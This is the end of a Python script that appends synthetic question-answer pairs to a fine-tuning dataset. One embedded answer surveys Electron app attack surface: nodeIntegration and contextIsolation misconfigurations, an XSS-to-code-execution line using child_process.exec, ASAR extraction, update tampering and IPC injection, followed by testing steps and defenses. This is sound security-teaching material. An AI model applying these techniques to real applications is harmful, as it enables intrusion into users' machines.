  "Electron: framework for building cross-platform desktop apps using Node.js and Chromium; applications built with HTML/CSS/JavaScript with full Node.js access; popular apps: Slack, VSCode, Discord, Atom, Teams. Attack surface: (1) nodeIntegration: if nodeIntegration: true in BrowserWindow webPreferences: any XSS in renderer becomes RCE (can call require() to access Node.js built-ins); attack: XSS in any web content loaded -> require('child_process').exec('calc.exe'). (2) contextIsolation: false: renderer and main process share JavaScript context; if false + any XSS -> access to ipcRenderer and other Electron APIs for privilege escalation to main process. (3) ASAR archive analysis: Electron apps bundle code in .asar archive (JSON-indexed tar format); extract: npx asar extract app.asar extracted/; review JavaScript source for hardcoded credentials, API keys, internal endpoints, security controls; ASAR not encrypted by default. (4) Auto-update mechanism: if update URL/signature verification missing: MITM to serve malicious update; insecure update server (HTTP or unsigned packages). (5) IPC message injection: main process exposes IPC handlers (ipcMain.on) for renderer calls; if renderer has XSS: call ipcRenderer.send('dangerous-operation', payload); if main process handler does not validate source or sanitise arguments: arbitrary file write/execution through main process. (6) Custom protocol handlers: Electron registers custom protocol (app://); deep links invoke app with attacker-controlled parameters; if protocol handler uses parameters unsafely. (7) Web content loading: if app loads external URLs with high privileges (nodeIntegration enabled, shell.openExternal misuse). Testing: extract ASAR; review webPreferences for nodeIntegration, contextIsolation, sandbox flags; run app, open DevTools (help menu or Ctrl+Shift+I if not disabled); attempt XSS in any user-controllable field; check network traffic for update mechanism; review IPC handlers for injection. Defense: contextIsolation: true; nodeIntegration: false; sandbox: true; preload script exposes limited API via contextBridge; validate all IPC messages.")

existing = sum(1 for _ in OUT.open()) if OUT.exists() else 0
print(f"Existing pairs: {existing}")
print(f"New pairs to add: {len(pairs)}")

with OUT.open("a") as f:
    for q, a in pairs:
        f.write(json.dumps({"messages": [
            {"role": "user", "content": q},
            {"role": "assistant", "content": a}
        ]}) + "\n")

total = sum(1 for _ in OUT.open())
print(f"Total upgrade_f pairs: {total}")
if total >= 1000:
    print("upgrade_f COMPLETE -- 1000+ pairs!")
else:
    print(f"Need {1000-total} more pairs")
